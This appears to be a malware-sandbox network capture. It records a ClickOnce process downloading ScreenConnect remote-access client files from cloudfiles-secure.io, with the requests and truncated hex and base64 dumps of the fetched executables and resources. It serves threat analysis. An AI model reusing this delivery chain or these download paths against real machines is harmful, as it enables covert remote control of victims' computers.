                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41
                                                                                                                                                                                                                Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62
                                                                                                                                                                                                                Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 44 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 42 41 56 47 2b 72 76 36 4e 75 58 31 45 79 56 48 31 61 41 41 41 41 4e 51 41 41 41 41 41 41 41 41 42 6a 41 51 41 41 4d 45 45 41 63 41 42 77 41 47 77 41 61 51 42 6a 41 47 45 41 64 41 42 70 41 47 38 41 62 67 42 45 41 47 6b 41 63 67 42 6c 41 47 4d 41 64 41 42 76 41 48 49 41 65 51 42 4f 41 47 45 41 62 51 42 6c 41 41 41 41 41 41 41 67 51 51 42 77 41 48 41 41 62 41 42 70 41 47 4d 41 59 51 42 30 41 47 6b 41 62 77 42 75 41 46 51 41 61 51 42 30
                                                                                                                                                                                                                Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAADAAAAAAAAAFBBRFBBRFBAVG+rv6NuX1EyVH1aAAAANQAAAAAAAABjAQAAMEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlAAAAAAAgQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAaQB0
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 6b 67 46 34 46 31 57 64 75 78 6e 77 71 53 2b 32 38 70 45 69 6a 37 50 45 59 6e 69 39 72 6c 58 50 65 38 7a 30 6b 49 4f 6b 31 53 51 39 52 4b 30 39 47 68 69 43 73 4a 38 4d 69 71 68 48 6f 6b 50 4b 69 45 68 79 31 58 77 66 41 76 72 39 65 45 68 78 4e 34 65 44 69 72 65 65 42 78 33 71 31 33 63 62 49 41 48 42 42 68 4a 67 75 4b 75 56 71 74 31 69 78 6e 66 74 72 58 35 48 78 68 6d 52 62 72 46 4d 6b 65 71 41 51 5a 77 2f 6b 4a 5a 42 51 5a 58 67 6c 51 71 58 52 30 62 45 4c 46 79 35 42 48 49 68 75 43 47 64 70 6f 46 46 69 68 5a 42 42 63 49 74 37 2f 4f 48 2f 44 35 56 6f 54 65 47 7a 69 2b 4d 48 77 41 43 34 66 50 4d 42 5a 7a 39 2b 41 42 77 34 61 42 30 44 34 74 4a 63 56 43 5a 56 41 78 57 42 53 4f 47 53 66 39 51 54 64 4b 36 6c 75 31 51 32 59 64 33 2f 79 51 37 59 50 57 55 6c 42 70
                                                                                                                                                                                                                Data Ascii: kgF4F1WduxnwqS+28pEij7PEYni9rlXPe8z0kIOk1SQ9RK09GhiCsJ8MiqhHokPKiEhy1XwfAvr9eEhxN4eDireeBx3q13cbIAHBBhJguKuVqt1ixnftrX5HxhmRbrFMkeqAQZw/kJZBQZXglQqXR0bELFy5BHIhuCGdpoFFihZBBcIt7/OH/D5VoTeGzi+MHwAC4fPMBZz9+ABw4aB0D4tJcVCZVAxWBSOGSf9QTdK6lu1Q2Yd3/yQ7YPWUlBp
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 7a 61 55 39 50 53 44 41 73 65 44 68 41 51 63 71 52 37 4d 56 31 65 7a 48 67 44 50 63 2f 68 4d 58 55 32 4e 69 4b 79 66 66 66 41 62 39 7a 4d 79 59 6e 43 65 56 64 46 65 32 57 45 70 58 75 44 54 4b 5a 70 47 69 6d 72 55 4d 31 30 76 50 62 62 62 5a 56 31 2b 52 70 44 5a 46 69 6f 45 4c 65 39 5a 6a 6d 34 7a 6c 49 51 63 51 30 4a 55 4e 43 75 42 30 4b 4c 55 2b 58 41 44 41 52 7a 56 45 4b 6f 6a 55 55 53 42 44 4d 42 78 4c 73 58 48 43 71 4f 44 4a 47 42 54 47 50 50 62 68 52 5a 72 47 49 79 79 63 6a 49 34 72 33 6a 45 5a 41 42 32 74 55 46 31 2b 39 58 44 42 4a 57 49 68 55 6f 6d 4c 2f 43 4c 51 4a 39 63 77 76 5a 50 6c 4f 66 69 75 7a 44 2f 50 61 6d 74 4f 6d 78 63 77 49 4b 58 52 79 6d 55 33 57 71 51 58 78 59 30 38 55 35 56 57 4c 55 41 42 31 58 69 61 6d 50 4d 52 6f 58 5a 45 45 65 67
                                                                                                                                                                                                                Data Ascii: zaU9PSDAseDhAQcqR7MV1ezHgDPc/hMXU2NiKyfffAb9zMyYnCeVdFe2WEpXuDTKZpGimrUM10vPbbbZV1+RpDZFioELe9Zjm4zlIQcQ0JUNCuB0KLU+XADARzVEKojUUSBDMBxLsXHCqODJGBTGPPbhRZrGIyycjI4r3jEZAB2tUF1+9XDBJWIhUomL/CLQJ9cwvZPlOfiuzD/PamtOmxcwIKXRymU3WqQXxY08U5VWLUAB1XiamPMRoXZEEeg
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 69 70 65 69 69 32 61 61 4b 43 67 46 56 6f 6a 2f 6e 61 56 74 6f 55 4e 46 73 67 4d 51 59 42 6c 31 50 32 61 4e 2b 39 6d 33 63 75 74 50 57 47 7a 53 65 7a 46 64 57 6a 76 66 59 50 54 55 2b 50 53 68 63 67 6f 43 79 34 39 64 55 35 6d 58 73 30 59 30 39 59 6b 6a 61 38 43 73 6c 2b 6d 33 46 7a 54 45 53 4c 4f 4a 65 59 48 66 6b 50 6b 63 52 4b 4d 78 31 70 42 37 70 4f 6b 37 35 70 5a 30 61 33 50 75 32 62 46 4a 68 6d 77 62 6b 58 38 65 78 55 4e 4c 76 6a 61 69 75 6b 78 33 35 39 70 31 7a 7a 64 62 49 45 65 4d 4c 2f 73 61 68 7a 38 2f 32 4b 35 55 68 42 42 33 6a 52 66 75 58 36 4d 68 6c 53 5a 53 78 57 49 6b 36 46 71 41 41 73 41 30 6f 31 48 4f 45 50 68 69 43 43 4a 30 78 37 73 56 44 41 2f 45 47 5a 4b 4b 42 54 55 72 75 4b 57 76 79 71 59 73 72 6d 7a 5a 64 2f 2b 62 4e 54 59 41 59 34 79
                                                                                                                                                                                                                Data Ascii: ipeii2aaKCgFVoj/naVtoUNFsgMQYBl1P2aN+9m3cutPWGzSezFdWjvfYPTU+PShcgoCy49dU5mXs0Y09Ykja8Csl+m3FzTESLOJeYHfkPkcRKMx1pB7pOk75pZ0a3Pu2bFJhmwbkX8exUNLvjaiukx359p1zzdbIEeML/sahz8/2K5UhBB3jRfuX6MhlSZSxWIk6FqAAsA0o1HOEPhiCCJ0x7sVDA/EGZKKBTUruKWvyqYsrmzZd/+bNTYAY4y
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 74 42 72 4c 4d 79 43 59 49 35 49 58 52 35 67 71 68 68 72 43 71 71 75 4d 67 59 31 4e 52 31 41 69 4f 30 42 32 4f 51 33 38 67 61 34 35 58 61 4d 37 38 6b 79 79 33 41 38 39 6e 78 64 38 73 6a 30 43 35 4a 6b 55 56 76 44 66 43 37 53 6d 45 7a 41 6f 4a 4b 67 4a 6e 4e 34 39 71 58 33 41 32 79 72 41 72 55 59 41 7a 36 68 62 59 4d 65 6c 30 73 38 68 70 47 39 54 4a 38 44 39 51 69 41 58 77 51 51 45 2f 78 51 58 37 36 50 46 63 57 58 43 51 6b 43 70 4a 5a 61 68 4b 46 66 52 6f 6e 57 48 63 70 5a 52 56 58 36 46 48 61 59 72 2f 43 71 41 43 54 44 59 35 46 77 74 61 75 72 69 71 6b 57 61 4d 43 32 74 39 30 53 65 30 52 42 67 56 7a 30 52 6a 6d 58 52 46 50 48 65 69 6c 4c 6c 50 78 2f 43 4a 68 41 75 50 34 62 77 65 63 46 2f 74 4a 64 54 76 73 74 7a 65 77 79 54 30 62 32 46 49 5a 7a 73 6b 59 75
                                                                                                                                                                                                                Data Ascii: tBrLMyCYI5IXR5gqhhrCqquMgY1NR1AiO0B2OQ38ga45XaM78kyy3A89nxd8sj0C5JkUVvDfC7SmEzAoJKgJnN49qX3A2yrArUYAz6hbYMel0s8hpG9TJ8D9QiAXwQQE/xQX76PFcWXCQkCpJZahKFfRonWHcpZRVX6FHaYr/CqACTDY5FwtauriqkWaMC2t90Se0RBgVz0RjmXRFPHeilLlPx/CJhAuP4bwecF/tJdTvstzewyT0b2FIZzskYu


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                1192.168.2.449735178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:22 UTC102OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:22 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 17866
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:22 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:22 UTC16168INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                2024-10-02 04:16:22 UTC1698INData Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55
                                                                                                                                                                                                                Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                2192.168.2.449747178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:26 UTC128OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 95520
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:27 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC16384INData Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00
                                                                                                                                                                                                                Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC16384INData Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b
                                                                                                                                                                                                                Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC16384INData Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39
                                                                                                                                                                                                                Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC16384INData Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00
                                                                                                                                                                                                                Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                2024-10-02 04:16:27 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                                                                                Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                3192.168.2.449749178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:28 UTC136OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-10-02 04:16:28 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 61216
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:28 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:28 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                                                                2024-10-02 04:16:28 UTC16384INData Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19
                                                                                                                                                                                                                Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
